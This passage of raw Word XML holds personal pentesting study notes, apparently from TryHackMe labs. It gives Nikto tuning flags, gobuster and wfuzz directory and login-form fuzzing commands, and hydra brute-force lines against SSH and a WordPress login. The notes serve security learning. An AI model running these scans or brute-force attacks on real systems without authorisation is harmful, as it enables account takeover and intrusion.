        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>1 – show any redirects that are given by the web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7508E457" w14:textId="41B59477" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>2 – show any cookies received</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0D79F6" w14:textId="68A3F325" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>E – output any errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B3CAD9" w14:textId="06EB6B5E" w:rsidR="001373EF" w:rsidRDefault="001373EF" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Tuning the Scan to Vulnerability Searching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10829ED0" w14:textId="3F614DE9" w:rsidR="001373EF" w:rsidRDefault="004A2C8F" w:rsidP="001373EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use -Tuning flag and provide a value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F6C4E8" w14:textId="1939B0C7" w:rsidR="004A2C8F" w:rsidRDefault="004A2C8F" w:rsidP="004A2C8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>0 – File Upload – search for anything on web server that may permit file upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553F8C2C" w14:textId="6842E8F8" w:rsidR="004A2C8F" w:rsidRDefault="004A2C8F" w:rsidP="004A2C8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>2 – Misconfigurations/Default Files – search for common files that are sensitive on the web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F05AEB" w14:textId="44053A37" w:rsidR="004A2C8F" w:rsidRDefault="004A2C8F" w:rsidP="004A2C8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>3 – Information Disclosure – gather information about the web server or application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17972507" w14:textId="39136DED" w:rsidR="004A2C8F" w:rsidRDefault="004A2C8F" w:rsidP="004A2C8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>4 – Injeciton – search for possible locations in which one can perform an injection attack such as XSS or HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396CE3AE" w14:textId="1548ABB9" w:rsidR="004A2C8F" w:rsidRDefault="004A2C8F" w:rsidP="004A2C8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>8 – Command Execution – search for anything that permits OS command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF0A742" w14:textId="72F3B43B" w:rsidR="004A2C8F" w:rsidRDefault="004A2C8F" w:rsidP="004A2C8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>9 – SQL Injection – look for applications that have URL parameters that are vulnerable to SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A562131" w14:textId="7668B2DE" w:rsidR="004A2C8F" w:rsidRDefault="004A2C8F" w:rsidP="004A2C8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Saving Your Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A2ECAE" w14:textId="683A9DED" w:rsidR="004A2C8F" w:rsidRDefault="004A2C8F" w:rsidP="004A2C8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-o argument with filename and extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC97B9E" w14:textId="51D935AC" w:rsidR="004A2C8F" w:rsidRDefault="004A2C8F" w:rsidP="004A2C8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. nikto -h &lt;ip&gt; -o report.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ECE692" w14:textId="2F83701F" w:rsidR="00073862" w:rsidRDefault="00073862" w:rsidP="00073862">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Conclusion and References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60712AE7" w14:textId="44504957" w:rsidR="00073862" w:rsidRDefault="007A6E65" w:rsidP="00073862">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00073862" w:rsidRPr="000C2180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://tryhackme.com/room/owasptop10</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A4F6F34" w14:textId="49374B61" w:rsidR="00073862" w:rsidRDefault="007A6E65" w:rsidP="00073862">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="00073862" w:rsidRPr="000C2180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://tryhackme.com/room/easypeasyctf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6BB65F88" w14:textId="2FDCFE26" w:rsidR="00073862" w:rsidRDefault="007A6E65" w:rsidP="00073862">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidR="00073862" w:rsidRPr="000C2180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://tryhackme.com/room/rpwebscanning</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50C7FA85" w14:textId="4693FA78" w:rsidR="00073862" w:rsidRDefault="007A6E65" w:rsidP="00073862">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidR="00073862" w:rsidRPr="000C2180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://tryhackme.com/room/blog</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10EAF15E" w14:textId="25D4BAD3" w:rsidR="00073862" w:rsidRDefault="007A6E65" w:rsidP="00073862">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidR="00073862" w:rsidRPr="000C2180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://tryhackme.com/room/rpwebscanning</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="06BDDBB4" w14:textId="29701E9B" w:rsidR="00073862" w:rsidRDefault="007A6E65" w:rsidP="00073862">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidR="00073862" w:rsidRPr="000C2180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://tryhackme.com/room/owasptop10</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20FD3CAB" w14:textId="4205DFA8" w:rsidR="00073862" w:rsidRDefault="007A6E65" w:rsidP="00073862">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidR="00073862" w:rsidRPr="000C2180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://tryhackme.com/room/toolsrus</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58065D8C" w14:textId="6B32A1BF" w:rsidR="00073862" w:rsidRDefault="007A6E65" w:rsidP="00073862">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidR="00073862" w:rsidRPr="000C2180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://tryhackme.com/room/easyctf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E2D3BB0" w14:textId="79CD6098" w:rsidR="00073862" w:rsidRDefault="00073862" w:rsidP="00073862">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56FF8FF8" w14:textId="2542F489" w:rsidR="00073862" w:rsidRDefault="00073862" w:rsidP="00073862">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58D6B079" w14:textId="77777777" w:rsidR="00073862" w:rsidRDefault="00073862" w:rsidP="00073862">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36805923" w14:textId="77777777" w:rsidR="00AC6BAD" w:rsidRDefault="00AC6BAD" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6686C645" w14:textId="344AD955" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Basic Pentesting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B713F6C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>nmap -sC -sV -oN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229B03D4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>http port open – navigate in URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEE9D94" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>inspect page source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70200E21" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>inspect element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CB0040" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>gobuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED55F42" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>find directorys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB42FCF" w14:textId="06D89E4C" w:rsidR="00DC7D6C" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>input in URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3D8F38" w14:textId="36A354D3" w:rsidR="00D06092" w:rsidRDefault="00D06092" w:rsidP="00D06092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">gobuster dir -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidR="00D10AAF" w:rsidRPr="000C2180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -w wordlist.txt -x php,txt,html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FB8CA9" w14:textId="286047EE" w:rsidR="00D06092" w:rsidRDefault="00D06092" w:rsidP="00D06092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use in combination with wfuzz when files of interest are found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B44BDB" w14:textId="395C04FB" w:rsidR="00D06092" w:rsidRDefault="00D06092" w:rsidP="00D06092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ex. wfuzz -c -z file,/usr/share/wordlists/dirb/big.txt - -h(w,c,l,h) &lt;ip&gt;:&lt;port&gt;/path/file.ext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A37EA93" w14:textId="7FADFB48" w:rsidR="00D06092" w:rsidRDefault="00D06092" w:rsidP="00D06092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. wfuzz -c -z</w:t>
      </w:r>
      <w:r w:rsidR="00740866">
        <w:t xml:space="preserve"> file,mywordlist.txt -d “username=FUZZ&amp;password=FUZZ” -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidR="00740866" w:rsidRPr="0030310C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://shibes.thm/login.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="738938D3" w14:textId="27D9B9DE" w:rsidR="00740866" w:rsidRDefault="00740866" w:rsidP="00740866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">wfuzz -c -z file,big.txt </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidR="00383611" w:rsidRPr="0030310C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://shibes.xyz/api.php?breed=FUZZ</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="704256A9" w14:textId="63D1F624" w:rsidR="00383611" w:rsidRDefault="00383611" w:rsidP="00740866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00383611">
        <w:t xml:space="preserve">wfuzz -c -z file,/opt/AoC-2020/Day-4/wordlist -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidR="00723F66" w:rsidRPr="00752056">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.109.106/api/site-log.php?date=FUZZ</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29A72652" w14:textId="58CAC1D2" w:rsidR="00723F66" w:rsidRPr="00F512ED" w:rsidRDefault="00723F66" w:rsidP="00723F66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use -q switch to prevent gobuster from outputting error messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9AE0F5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>enum4linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B4D8CB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EDA9A7" w14:textId="50ADDBEA" w:rsidR="00DC7D6C" w:rsidRDefault="00A04CD7" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
        <w:t>hydra -l &lt;username&gt; -P &lt;path to list&gt; ssh://&lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DA7C78" w14:textId="2D3EBB9B" w:rsidR="00723F66" w:rsidRDefault="00723F66" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo hydra -l &lt;username&gt; -P &lt;path to list&gt; &lt;ip&gt; http-post-form “&lt;burpsuite wp-login captured from burpsuite” -t &lt;thread count&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550391F8" w14:textId="614056A2" w:rsidR="00C65B2F" w:rsidRDefault="00C65B2F" w:rsidP="00C65B2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Nikto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E075E4F" w14:textId="1AFF3B12" w:rsidR="00C65B2F" w:rsidRPr="00F512ED" w:rsidRDefault="00A04CD7" w:rsidP="00C65B2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
